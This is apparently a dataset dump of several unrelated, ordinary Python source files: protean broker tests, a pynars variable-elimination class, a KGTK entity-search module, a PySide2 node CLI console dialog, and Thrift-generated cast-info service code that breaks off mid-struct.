text stringlengths 957 885k |
|---|
import pytest
from mock import patch
from protean import BaseCommand, BaseCommandHandler, BaseEvent, BaseSubscriber
from protean.adapters.broker.inline import InlineBroker
from protean.exceptions import ConfigurationError
from protean.fields import Auto, Integer, String
from protean.infra.eventing import EventLog
from protean.port.broker import BaseBroker
from protean.utils import CommandProcessingType
class PersonAdded(BaseEvent):
    """Domain event raised when a new person is added (test fixture)."""

    # Auto-generated identifier field.
    id = Auto(identifier=True)
    first_name = String(max_length=50, required=True)
    last_name = String(max_length=50, required=True)
    # Defaults to 21 when not supplied.
    age = Integer(default=21)
class NotifySSOSubscriber(BaseSubscriber):
    """Subscriber wired to `PersonAdded` events (test double)."""

    class Meta:
        # Event this subscriber listens for.
        event = PersonAdded

    def __call__(self, domain_event_dict):
        # Test-only side effect: echo the received event payload.
        print("Received Event: ", domain_event_dict)
class AddPersonCommand(BaseCommand):
    """Command carrying the data needed to add a new person (test fixture)."""

    first_name = String(max_length=50, required=True)
    last_name = String(max_length=50, required=True)
    # Defaults to 21 when not supplied.
    age = Integer(default=21)
class AddNewPersonCommandHandler(BaseCommandHandler):
    """CommandHandler that adds a new person into the system"""

    class Meta:
        # Command type this handler processes.
        command_cls = AddPersonCommand

    def notify(self, command):
        # Test-only side effect: echo the received command.
        print("Received command: ", command)
class TestBrokerInitialization:
    """Tests for lazy initialization of the domain's broker registry.

    The registry initializes on first use (len/iter/get/set/del/publish)
    and must not re-initialize afterwards; `_initialize` call counts are
    observed via mocker.spy.
    """

    @pytest.fixture(autouse=True)
    def register_elements(self, test_domain):
        test_domain.register(PersonAdded)

    def test_that_base_broker_class_cannot_be_instantiated(self):
        # BaseBroker is abstract; direct instantiation must fail.
        with pytest.raises(TypeError):
            BaseBroker()

    def test_that_a_concrete_broker_can_be_initialized_successfully(self, test_domain):
        broker = InlineBroker("dummy_name", test_domain, {})
        assert broker is not None

    def test_that_domain_initializes_broker_from_config(self, test_domain):
        assert len(list(test_domain.brokers)) == 1
        assert isinstance(list(test_domain.brokers.values())[0], InlineBroker)

    def test_that_atleast_one_broker_has_to_be_configured(self, test_domain):
        default_broker = test_domain.config["BROKERS"].pop("default")

        with pytest.raises(ConfigurationError):
            len(test_domain.brokers)  # Triggers an initialization

        # Push back default broker config to avoid pytest teardown errors
        test_domain.config["BROKERS"]["default"] = default_broker

    def test_that_a_default_broker_is_mandatory(self, test_domain):
        dup_broker = InlineBroker("duplicate", test_domain, {})

        # Simulation - Add a secondary broker and remove default broker from config
        default_broker = test_domain.config["BROKERS"].pop("default")
        test_domain.config["BROKERS"]["secondary"] = {
            "PROVIDER": "protean.adapters.InlineBroker"
        }

        with pytest.raises(ConfigurationError):
            # This will try to initialize brokers and fail in absence of a 'default' broker
            test_domain.brokers["duplicate"] = dup_broker

        # Push back default broker config to avoid pytest teardown errors
        test_domain.config["BROKERS"]["default"] = default_broker

    def test_that_domain_initializes_broker_before_iteration(self, test_domain):
        brokers = [broker for broker in test_domain.brokers]
        assert len(brokers) == 1

    def test_that_domain_initializes_broker_before_get_op(self, mocker, test_domain):
        spy = mocker.spy(test_domain.brokers, "_initialize")
        test_domain.brokers["default"]  # Calls `__getitem__`
        assert spy.call_count == 1

    def test_that_brokers_are_not_initialized_again_before_get_op_if_initialized_already(
        self, mocker, test_domain
    ):
        # Initialize brokers
        len(test_domain.brokers)

        spy = mocker.spy(test_domain.brokers, "_initialize")
        test_domain.brokers["default"]  # Calls `__getitem__`; should not reinitialize
        assert spy.call_count == 0

    def test_that_domain_initializes_broker_before_set_operation(
        self, mocker, test_domain
    ):
        dup_broker = InlineBroker("duplicate broker", test_domain, {})

        spy = mocker.spy(test_domain.brokers, "_initialize")
        test_domain.brokers["dup"] = dup_broker
        assert spy.call_count == 1

    def test_that_brokers_are_not_initialized_again_before_set_if_initialized_already(
        self, mocker, test_domain
    ):
        # Initialize brokers
        len(test_domain.brokers)

        dup_broker = InlineBroker("duplicate broker", test_domain, {})

        spy = mocker.spy(test_domain.brokers, "_initialize")
        test_domain.brokers["dup"] = dup_broker  # Should not reinitialize
        assert spy.call_count == 0

    def test_that_domain_initializes_broker_before_del_operation(
        self, mocker, test_domain
    ):
        spy = mocker.spy(test_domain.brokers, "_initialize")
        del test_domain.brokers["default"]
        assert spy.call_count == 1

    def test_that_brokers_are_not_initialized_again_before_del_if_initialized_already(
        self, mocker, test_domain
    ):
        len(test_domain.brokers)

        spy = mocker.spy(test_domain.brokers, "_initialize")
        del test_domain.brokers["default"]
        assert spy.call_count == 0

    def test_that_brokers_are_initialized_on_publishing_an_event(
        self, mocker, test_domain
    ):
        spy = mocker.spy(test_domain.brokers, "_initialize")
        test_domain.publish(
            PersonAdded(id="1234", first_name="John", last_name="Doe", age=24,)
        )
        assert spy.call_count == 1

    def test_that_brokers_are_not_reinitialized_on_publishing_an_event(
        self, mocker, test_domain
    ):
        len(test_domain.brokers)  # Triggers initialization

        spy = mocker.spy(test_domain.brokers, "_initialize")
        test_domain.publish(
            PersonAdded(id="1234", first_name="John", last_name="Doe", age=24,)
        )
        assert spy.call_count == 0

    def test_that_brokers_are_initialized_on_receiving_a_command(
        self, mocker, test_domain
    ):
        test_domain.register(AddPersonCommand)
        test_domain.register(AddNewPersonCommandHandler)

        spy = mocker.spy(test_domain.brokers, "_initialize")
        test_domain.publish(
            AddPersonCommand(first_name="John", last_name="Doe", age=21)
        )
        assert spy.call_count == 1

    def test_that_brokers_are_not_reinitialized_on_receiving_a_command(
        self, mocker, test_domain
    ):
        test_domain.register(AddPersonCommand)
        test_domain.register(AddNewPersonCommandHandler)

        len(test_domain.brokers)  # Triggers initialization

        spy = mocker.spy(test_domain.brokers, "_initialize")
        test_domain.publish(
            AddPersonCommand(first_name="John", last_name="Doe", age=21)
        )
        assert spy.call_count == 0

    def test_that_brokers_can_be_registered_manually(self, test_domain):
        duplicate_broker = InlineBroker("duplicate broker", test_domain, {})

        test_domain.brokers["duplicate"] = duplicate_broker
        assert len(test_domain.brokers) == 2
class TestBrokerSubscriberInitialization:
    """Tests that registered subscribers are wired into their broker."""

    def test_that_registered_subscribers_are_initialized(self, test_domain):
        test_domain.register(NotifySSOSubscriber)

        len(test_domain.brokers)  # Triggers initialization

        # Subscribers are indexed by the fully-qualified event name.
        assert (
            "tests.test_brokers.PersonAdded"
            in test_domain.brokers["default"]._subscribers
        )
        assert (
            NotifySSOSubscriber
            in test_domain.brokers["default"]._subscribers[
                "tests.test_brokers.PersonAdded"
            ]
        )

    def test_that_subscribers_with_unknown_brokers_cannot_be_initialized(
        self, test_domain
    ):
        NotifySSOSubscriber.meta_.broker = "unknown"
        test_domain.register(NotifySSOSubscriber)

        with pytest.raises(ConfigurationError):
            len(test_domain.brokers)  # Triggers initialization

        # Reset the broker after test
        NotifySSOSubscriber.meta_.broker = "default"
class TestEventPublish:
    """Tests for event publication through the broker registry."""

    @pytest.fixture(autouse=True)
    def register_elements(self, test_domain):
        test_domain.register(PersonAdded)

    def test_that_broker_receives_event(self, mocker, test_domain):
        spy = mocker.spy(test_domain.brokers, "publish")
        test_domain.publish(
            PersonAdded(id="1234", first_name="John", last_name="Doe", age=24,)
        )
        assert spy.call_count == 1

    def test_that_event_log_is_populated(self, mocker, test_domain):
        # Publishing should also persist an EventLog record.
        test_domain.register(EventLog)

        test_domain.publish(
            PersonAdded(id="1234", first_name="John", last_name="Doe", age=24,)
        )

        events = test_domain.repository_for(EventLog).all()
        assert len(events) == 1
class TestBrokerCommandHandlerInitialization:
    """Tests that registered command handlers are wired into their broker."""

    def test_that_registered_command_handlers_are_initialized(self, test_domain):
        test_domain.register(AddNewPersonCommandHandler)

        # Handlers are indexed by the fully-qualified command name.
        assert (
            "tests.test_brokers.AddPersonCommand"
            in test_domain.brokers["default"]._command_handlers
        )
        assert (
            test_domain.brokers["default"]._command_handlers[
                "tests.test_brokers.AddPersonCommand"
            ]
            is AddNewPersonCommandHandler
        )
        assert (
            test_domain.command_handler_for(AddPersonCommand)
            == AddNewPersonCommandHandler
        )

    def test_that_command_handlers_with_unknown_brokers_cannot_be_initialized(
        self, test_domain
    ):
        # Renamed from `test_that_subscribers_with_unknown_brokers_...`
        # (copy-paste misnomer) — this case exercises command handlers,
        # not subscribers.
        AddNewPersonCommandHandler.meta_.broker = "unknown"
        test_domain.register(AddNewPersonCommandHandler)

        with pytest.raises(ConfigurationError):
            len(test_domain.brokers)  # Triggers initialization

        # Reset the broker after test
        AddNewPersonCommandHandler.meta_.broker = "default"
class TestCommandPublish:
    """Tests for synchronous command dispatch to the registered handler."""

    @patch.object(AddNewPersonCommandHandler, "__call__")
    def test_that_brokers_receive_a_command(self, mock, test_domain):
        test_domain.register(AddPersonCommand)
        test_domain.register(AddNewPersonCommandHandler)
        # Force SYNC processing so the handler is invoked inline.
        test_domain.config["COMMAND_PROCESSING"] = CommandProcessingType.SYNC.value

        command = AddPersonCommand(first_name="John", last_name="Doe", age=21)
        test_domain.handle(command)

        mock.assert_called_once_with(command)
|
from typing import Dict, List, Tuple
from bidict import bidict
from pynars.Narsese import Term
from pynars.utils.IndexVar import IntVar
from .Substitution import Substitution
class Elimination(Substitution):
    '''
    The substitution of var-to-const ("elimination" of variables).

    For each variable kind (independent `$`, dependent `#`, query `?`) the
    constructor records whether the proposed var->const pairing is
    conflict-free and, if so, the resulting bidirectional mapping.
    '''

    def __init__(self, term_src: Term, term_tgt: Term, ivar_src: List[IntVar]=None, iconst_tgt: List[Term]=None, dvar_src: List[IntVar]=None, dconst_tgt: List[Term]=None, qvar_src: List[IntVar]=None, qconst_tgt: List[Term]=None) -> None:
        super().__init__(term_src, term_tgt)
        # Safe defaults so the `is_*_valid` properties never raise
        # AttributeError when a variable kind was not supplied (previously
        # these attributes were only set inside the conditionals below).
        self.is_conflict_ivar = self.is_conflict_dvar = self.is_conflict_qvar = False
        self.mapping_ivar = bidict()
        self.mapping_dvar = bidict()
        self.mapping_qvar = bidict()
        if (ivar_src is not None and iconst_tgt is not None):
            self.is_conflict_ivar, self.mapping_ivar = self.check_conflict(ivar_src, iconst_tgt)
        if (dvar_src is not None and dconst_tgt is not None):
            self.is_conflict_dvar, self.mapping_dvar = self.check_conflict(dvar_src, dconst_tgt)
        if (qvar_src is not None and qconst_tgt is not None):
            self.is_conflict_qvar, self.mapping_qvar = self.check_conflict(qvar_src, qconst_tgt)

    @property
    def is_valid(self):
        # Valid when at least one kind has a non-empty, conflict-free mapping.
        return self.is_qvar_valid or self.is_dvar_valid or self.is_ivar_valid

    @property
    def is_qvar_valid(self):
        return not self.is_conflict_qvar and len(self.mapping_qvar) > 0

    @property
    def is_dvar_valid(self):
        return not self.is_conflict_dvar and len(self.mapping_dvar) > 0

    @property
    def is_ivar_valid(self):
        return not self.is_conflict_ivar and len(self.mapping_ivar) > 0

    @staticmethod
    def check_conflict(vars: List[IntVar], consts: List[Term]) -> Tuple[bool, Dict[IntVar, Term]]:
        '''
        Return ``(is_conflict, mapping)`` for a candidate var->const pairing.

        no conflict:
            (&&, <$x-->A>, <$y-->A>)
            (&&, <B-->A>, <C-->A>)
            [0, 1], [B, C]
            [0, 1], [C, B]
        conflict:
            (&&, <$x-->A>, <$x-->B>)
            (&&, <C-->A>, <D-->B>)
            [0, 0], [C, D]
        '''
        mapping_ret = bidict()
        # A length mismatch cannot form a one-to-one substitution.
        if len(vars) != len(consts): return True, mapping_ret
        mapping = {key: set() for key in set(vars)}
        is_conflict = False
        for var, const in zip(vars, consts):
            var_list = mapping[var]
            var_list.add(const)
            # The same variable bound to two distinct constants is a conflict.
            if len(var_list) > 1:
                is_conflict = True
                break
        if not is_conflict:
            mapping_ret = bidict({key: list(value)[0] for key, value in mapping.items()})
        return is_conflict, mapping_ret

    def apply(self, term_src: Term=None, term_tgt: Term=None):
        '''Apply the substitution to the terms. Not yet implemented (TODO below).'''
        term_src = term_src if term_src is not None else self.term_src
        term_tgt = term_tgt if term_tgt is not None else self.term_tgt
        mapping_ivar = self.mapping_ivar
        mapping_dvar = self.mapping_dvar
        mapping_qvar = self.mapping_qvar
        # NOTE(review): `mapping_const` is presumably provided by the
        # `Substitution` base class — confirm before implementing.
        mapping_const = self.mapping_const
        # TODO: replace var with const
        pass
<filename>tl/candidate_generation/get_kgtk_search_matches.py
import requests
import pandas as pd
from typing import List
from concurrent.futures import ThreadPoolExecutor
from itertools import repeat
from tl.file_formats_validator import FFV
from tl.exceptions import UnsupportTypeError
from tl.exceptions import RequiredInputParameterMissingException
from tl.candidate_generation.es_search import Search
from tl.candidate_generation.utility import Utility
class KGTKSearchMatches(object):
    """Candidate generation: match input labels to KG entities via the KGTK search API."""

    def __init__(self, es_url, es_index, api_url='https://kgtk.isi.edu/api', es_user=None, es_pass=None):
        self.api_url = api_url
        self.ffv = FFV()
        self.es_search = Search(es_url, es_index, es_user, es_pass)
        self.utility = Utility(self.es_search)

    def get_matches(self, column, size=20, file_path=None, df=None, output_column_name: str = "retrieval_score",
                    auxiliary_fields: List[str] = None, auxiliary_folder: str = None,
                    auxiliary_file_prefix='kgtk_search_', max_threads=50):
        """
        uses KGTK search API to retrieve identifiers of KG entities matching the input search term.

        Args:
            column: the column used for retrieving candidates.
            size: maximum number of candidates to retrieve, default is 20.
            file_path: input file in canonical format
            df: input dataframe in canonical format
            output_column_name: the output column name where the normalized scores will be stored.
             Default is "retrieval_score".
            auxiliary_fields: fields to copy from the ES node info of each candidate.
            auxiliary_folder: folder where the auxiliary files are written.
            auxiliary_file_prefix: file-name prefix for the auxiliary files.
            max_threads: upper bound on concurrent KGTK API requests.

        Returns: a dataframe in candidates format

        Raises:
            RequiredInputParameterMissingException: neither `file_path` nor `df` given.
            UnsupportTypeError: input is neither canonical nor candidates format.
        """
        if file_path is None and df is None:
            raise RequiredInputParameterMissingException(
                'One of the input parameters is required: {} or {}'.format("file_path", "df"))

        if file_path:
            df = pd.read_csv(file_path, dtype=object)

        df.fillna(value="", inplace=True)
        columns = df.columns

        # Query the API once per unique label, in parallel.
        uniq_labels = list(df[column].unique())
        max_threads = min(len(uniq_labels), max_threads)

        results_dict = {}
        with ThreadPoolExecutor(max_workers=max_threads) as executor:
            for _results_dict in executor.map(
                    self.kgtk_api_search, uniq_labels, repeat(size)):
                results_dict.update(_results_dict)

        new_df_list = list()
        seen_dict = {}
        all_candidates = []
        candidate_aux_dict = {}
        for i, row in df.iterrows():
            # Expand candidates only once per (column, row, label) triple.
            row_key = f"{row['column']}_{row['row']}_{row[column]}"
            row_candidates = set()
            if row_key not in seen_dict:
                search_results = results_dict.get(row[column], [])
                if len(search_results) > 0:
                    for sr in search_results:
                        _ = {}
                        for c in columns:
                            _[c] = row[c]
                        _['kg_id'] = sr['qnode']
                        row_candidates.add(sr['qnode'])
                        _['pagerank'] = sr['pagerank']
                        kg_label = []
                        kg_description = ''
                        # Labels and aliases are joined into one '|'-separated field.
                        if 'label' in sr and len(sr['label']) > 0:
                            kg_label.extend(sr['label'])
                        if 'alias' in sr and len(sr['alias']) > 0:
                            kg_label.extend(sr['alias'])
                        _['kg_labels'] = "|".join(kg_label)
                        _['method'] = 'kgtk-search'
                        if 'description' in sr and len(sr['description']) > 0:
                            kg_description = "|".join(sr['description'])
                        _['kg_descriptions'] = kg_description
                        _[output_column_name] = sr['score']
                        new_df_list.append(_)
                    all_candidates.extend(self.es_search.get_node_info(list(row_candidates)))
                else:
                    # No API hits: emit an empty candidate row so the input row survives.
                    _ = {}
                    for c in columns:
                        _[c] = row[c]
                    _['kg_id'] = ''
                    _['pagerank'] = ''
                    _['kg_labels'] = ''
                    _['method'] = 'kgtk-search'
                    _['kg_descriptions'] = ''
                    _[output_column_name] = ''
                    new_df_list.append(_)
                seen_dict[row_key] = 1

        # Collect the requested auxiliary fields per candidate from ES node info.
        for candidate in all_candidates:
            _id = candidate['_id']
            _source = candidate['_source']
            if _id not in candidate_aux_dict:
                candidate_aux_dict[_id] = {}
            if auxiliary_fields is not None:
                for auxiliary_field in auxiliary_fields:
                    if auxiliary_field in _source:
                        candidate_aux_dict[_id][auxiliary_field] = _source[auxiliary_field]

        self.utility.write_auxiliary_files(auxiliary_folder, candidate_aux_dict, auxiliary_fields,
                                           prefix=auxiliary_file_prefix)

        if self.ffv.is_canonical_file(df):
            return pd.DataFrame(new_df_list)

        if self.ffv.is_candidates_file(df):
            return pd.concat([df, pd.DataFrame(new_df_list)]).sort_values(by=['column', 'row', column])

        raise UnsupportTypeError("The input file is neither a canonical file or a candidate file!")

    def kgtk_api_search(self, uniq_label: str, size: int) -> dict:
        """Query the KGTK search API for one label; return ``{label: results}``."""
        results_dict = dict()
        # Let `requests` build the query string so labels containing spaces,
        # '&', '#', or non-ASCII characters are URL-encoded correctly (the
        # previous f-string interpolation sent them raw, corrupting the URL).
        params = {
            'q': uniq_label,
            'extra_info': 'true',
            'language': 'en',
            'type': 'ngram',
            'size': size,
            'lowercase': 'true',
        }
        results_dict[uniq_label] = requests.get(self.api_url, params=params).json()
        return results_dict
|
from PySide2.QtCore import Qt, SIGNAL, QProcess, QByteArray
from PySide2.QtWidgets import QDialog, QGridLayout, QTextEdit, QLineEdit, QCompleter
from pygments import highlight
from pygments.formatters.html import HtmlFormatter
from pygments.lexers.data import JsonLexer
from node_launcher.logging import log
class ConsoleDialog(QDialog):
    """Interactive console for sending CLI commands to a running node.

    Commands typed into the input line are executed through the node's CLI
    binary in a child QProcess; output is appended to a read-only text area,
    with JSON responses syntax-highlighted.
    """

    def __init__(self, node):
        super().__init__()
        self.node = node
        # Show the CLI 'help' output the first time the dialog is shown.
        self.show_help = True

        self.layout = QGridLayout()
        self.setLayout(self.layout)

        self.output_area = QTextEdit()
        self.output_area.setReadOnly(True)
        self.output_area.acceptRichText = True
        # Cap scrollback so long sessions don't grow memory unboundedly.
        self.output_area.document().setMaximumBlockCount(5000)
        self.layout.addWidget(self.output_area)

        self.input_area = QLineEdit()
        self.completer = QCompleter()
        # noinspection PyUnresolvedReferences
        self.completer.setCaseSensitivity(Qt.CaseInsensitive)
        self.input_area.setCompleter(self.completer)
        self.input_area.setFocus()
        self.layout.addWidget(self.input_area)

        self.connect(self.input_area, SIGNAL("returnPressed(void)"),
                     self.execute_user_command)

    @property
    def cli(self):
        """Path to the node's CLI binary, or None while the node is starting."""
        try:
            return self.node.software.cli
        except AttributeError:
            return None

    @property
    def cli_args(self):
        """Base CLI arguments from the node configuration, or None if unavailable."""
        try:
            return self.node.configuration.cli_args
        except AttributeError:
            return None

    def showEvent(self, event):
        super().showEvent(event)
        # Run 'help' once, retrying on subsequent shows until it succeeds.
        if self.show_help:
            success = self.run_command('help')
            if success:
                self.show_help = False

    def execute_user_command(self):
        cmd = str(self.input_area.text())
        self.input_area.clear()
        self.run_command(cmd)

    def run_command(self, command):
        """Start `command` through the node CLI asynchronously.

        Returns True when the process was started, False when the CLI is not
        yet available or startup failed.
        """
        try:
            if self.cli is None or self.cli_args is None:
                self.output_area.append('Node starting up, please try again later...')
                return False
            self.output_area.append(f'> {command}\n')
            # Parent the QProcess to the dialog: a bare local `QProcess()`
            # could be garbage-collected as soon as this method returns,
            # killing the child before any output arrives.
            process = QProcess(self)
            process.setProgram(self.cli)
            process.setCurrentReadChannel(0)
            # noinspection PyUnresolvedReferences
            process.readyReadStandardError.connect(
                lambda: self.handle_cli_error_output(process)
            )
            # noinspection PyUnresolvedReferences
            process.readyReadStandardOutput.connect(
                lambda: self.handle_cli_output(process)
            )
            args = command.split(' ')
            # Tolerate users typing the binary name first (e.g. "lncli getinfo").
            if args[0] == self.cli.split('/')[-1]:
                args.pop(0)
            process.setArguments(self.cli_args + args)
            process.start()
            log.info(
                'run_command',
                program=self.cli,
                args=self.cli_args,
                cmd=command
            )
            return True
        except Exception:
            # NOTE(review): broad catch keeps the console usable during node
            # startup races; the message presumes that's the cause — confirm.
            self.output_area.append('Node starting up, please try again later...')
            return False

    def handle_cli_error_output(self, cli_process: QProcess):
        output: QByteArray = cli_process.readAllStandardError()
        message = output.data().decode('utf-8').strip()
        self.output_area.append(message)

    def handle_cli_output(self, cli_process: QProcess):
        output: QByteArray = cli_process.readAllStandardOutput()
        message = output.data().decode('utf-8').strip()
        if message.startswith('{') or message.startswith('['):
            # Pretty-print JSON responses as inline-styled HTML.
            formatter = HtmlFormatter()
            formatter.noclasses = True
            formatter.linenos = False
            formatter.nobackground = True
            message = highlight(message, JsonLexer(), formatter)
            self.output_area.insertHtml(message)
        else:
            self.output_area.append(message)
|
#
# Autogenerated by Thrift Compiler (0.12.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
# Registry of generated struct classes; populated via `all_structs.append(...)` below.
all_structs = []
class Iface(object):
    """Thrift-generated service interface for the cast-info service (stub methods)."""

    def WriteCastInfo(self, req_id, cast_info_id, name, gender, intro, carrier):
        """
        Parameters:
         - req_id
         - cast_info_id
         - name
         - gender
         - intro
         - carrier
        """
        pass

    def ReadCastInfo(self, req_id, cast_ids, carrier):
        """
        Parameters:
         - req_id
         - cast_ids
         - carrier
        """
        pass
class Client(Iface):
    """Thrift-generated RPC client: serializes calls and deserializes replies."""

    def __init__(self, iprot, oprot=None):
        # A single protocol may serve both directions; a separate output
        # protocol is optional.
        self._iprot = self._oprot = iprot
        if oprot is not None:
            self._oprot = oprot
        self._seqid = 0

    def WriteCastInfo(self, req_id, cast_info_id, name, gender, intro, carrier):
        """
        Parameters:
         - req_id
         - cast_info_id
         - name
         - gender
         - intro
         - carrier
        """
        self.send_WriteCastInfo(req_id, cast_info_id, name, gender, intro, carrier)
        self.recv_WriteCastInfo()

    def send_WriteCastInfo(self, req_id, cast_info_id, name, gender, intro, carrier):
        self._oprot.writeMessageBegin('WriteCastInfo', TMessageType.CALL, self._seqid)
        args = WriteCastInfo_args()
        args.req_id = req_id
        args.cast_info_id = cast_info_id
        args.name = name
        args.gender = gender
        args.intro = intro
        args.carrier = carrier
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()

    def recv_WriteCastInfo(self):
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = WriteCastInfo_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.se is not None:
            # Service-declared exception propagated from the server.
            raise result.se
        return

    def ReadCastInfo(self, req_id, cast_ids, carrier):
        """
        Parameters:
         - req_id
         - cast_ids
         - carrier
        """
        self.send_ReadCastInfo(req_id, cast_ids, carrier)
        return self.recv_ReadCastInfo()

    def send_ReadCastInfo(self, req_id, cast_ids, carrier):
        self._oprot.writeMessageBegin('ReadCastInfo', TMessageType.CALL, self._seqid)
        args = ReadCastInfo_args()
        args.req_id = req_id
        args.cast_ids = cast_ids
        args.carrier = carrier
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()

    def recv_ReadCastInfo(self):
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = ReadCastInfo_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        if result.se is not None:
            raise result.se
        raise TApplicationException(TApplicationException.MISSING_RESULT, "ReadCastInfo failed: unknown result")
class Processor(Iface, TProcessor):
    """Thrift-generated server-side dispatcher: routes incoming messages to handler methods."""

    def __init__(self, handler):
        self._handler = handler
        self._processMap = {}
        self._processMap["WriteCastInfo"] = Processor.process_WriteCastInfo
        self._processMap["ReadCastInfo"] = Processor.process_ReadCastInfo

    def process(self, iprot, oprot):
        (name, type, seqid) = iprot.readMessageBegin()
        if name not in self._processMap:
            # Unknown method: drain the request and reply with an exception.
            iprot.skip(TType.STRUCT)
            iprot.readMessageEnd()
            x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
            oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
            x.write(oprot)
            oprot.writeMessageEnd()
            oprot.trans.flush()
            return
        else:
            self._processMap[name](self, seqid, iprot, oprot)
        return True

    def process_WriteCastInfo(self, seqid, iprot, oprot):
        args = WriteCastInfo_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = WriteCastInfo_result()
        try:
            self._handler.WriteCastInfo(args.req_id, args.cast_info_id, args.name, args.gender, args.intro, args.carrier)
            msg_type = TMessageType.REPLY
        except TTransport.TTransportException:
            # Transport failures must propagate to tear down the connection.
            raise
        except ServiceException as se:
            # Declared service exception travels back as a normal REPLY field.
            msg_type = TMessageType.REPLY
            result.se = se
        except TApplicationException as ex:
            logging.exception('TApplication exception in handler')
            msg_type = TMessageType.EXCEPTION
            result = ex
        except Exception:
            logging.exception('Unexpected exception in handler')
            msg_type = TMessageType.EXCEPTION
            result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
        oprot.writeMessageBegin("WriteCastInfo", msg_type, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()

    def process_ReadCastInfo(self, seqid, iprot, oprot):
        args = ReadCastInfo_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = ReadCastInfo_result()
        try:
            result.success = self._handler.ReadCastInfo(args.req_id, args.cast_ids, args.carrier)
            msg_type = TMessageType.REPLY
        except TTransport.TTransportException:
            raise
        except ServiceException as se:
            msg_type = TMessageType.REPLY
            result.se = se
        except TApplicationException as ex:
            logging.exception('TApplication exception in handler')
            msg_type = TMessageType.EXCEPTION
            result = ex
        except Exception:
            logging.exception('Unexpected exception in handler')
            msg_type = TMessageType.EXCEPTION
            result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
        oprot.writeMessageBegin("ReadCastInfo", msg_type, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class WriteCastInfo_args(object):
    """
    Thrift-generated argument struct for WriteCastInfo.

    Attributes:
     - req_id
     - cast_info_id
     - name
     - gender
     - intro
     - carrier
    """

    def __init__(self, req_id=None, cast_info_id=None, name=None, gender=None, intro=None, carrier=None,):
        self.req_id = req_id
        self.cast_info_id = cast_info_id
        self.name = name
        self.gender = gender
        self.intro = intro
        self.carrier = carrier

    def read(self, iprot):
        # Fast path: use the C-accelerated decoder when available.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.I64:
                    self.req_id = iprot.readI64()
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.I64:
                    self.cast_info_id = iprot.readI64()
                else:
                    iprot.skip(ftype)
            elif fid == 3:
                if ftype == TType.STRING:
                    self.name = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 4:
                if ftype == TType.BOOL:
                    self.gender = iprot.readBool()
                else:
                    iprot.skip(ftype)
            elif fid == 5:
                if ftype == TType.STRING:
                    self.intro = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 6:
                if ftype == TType.MAP:
                    # carrier: map<string, string> (e.g. tracing context).
                    self.carrier = {}
                    (_ktype260, _vtype261, _size259) = iprot.readMapBegin()
                    for _i263 in range(_size259):
                        _key264 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                        _val265 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                        self.carrier[_key264] = _val265
                    iprot.readMapEnd()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        # Fast path: use the C-accelerated encoder when available.
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('WriteCastInfo_args')
        if self.req_id is not None:
            oprot.writeFieldBegin('req_id', TType.I64, 1)
            oprot.writeI64(self.req_id)
            oprot.writeFieldEnd()
        if self.cast_info_id is not None:
            oprot.writeFieldBegin('cast_info_id', TType.I64, 2)
            oprot.writeI64(self.cast_info_id)
            oprot.writeFieldEnd()
        if self.name is not None:
            oprot.writeFieldBegin('name', TType.STRING, 3)
            oprot.writeString(self.name.encode('utf-8') if sys.version_info[0] == 2 else self.name)
            oprot.writeFieldEnd()
        if self.gender is not None:
            oprot.writeFieldBegin('gender', TType.BOOL, 4)
            oprot.writeBool(self.gender)
            oprot.writeFieldEnd()
        if self.intro is not None:
            oprot.writeFieldBegin('intro', TType.STRING, 5)
            oprot.writeString(self.intro.encode('utf-8') if sys.version_info[0] == 2 else self.intro)
            oprot.writeFieldEnd()
        if self.carrier is not None:
            oprot.writeFieldBegin('carrier', TType.MAP, 6)
            oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.carrier))
            for kiter266, viter267 in self.carrier.items():
                oprot.writeString(kiter266.encode('utf-8') if sys.version_info[0] == 2 else kiter266)
                oprot.writeString(viter267.encode('utf-8') if sys.version_info[0] == 2 else viter267)
            oprot.writeMapEnd()
            oprot.writeFieldEnd()
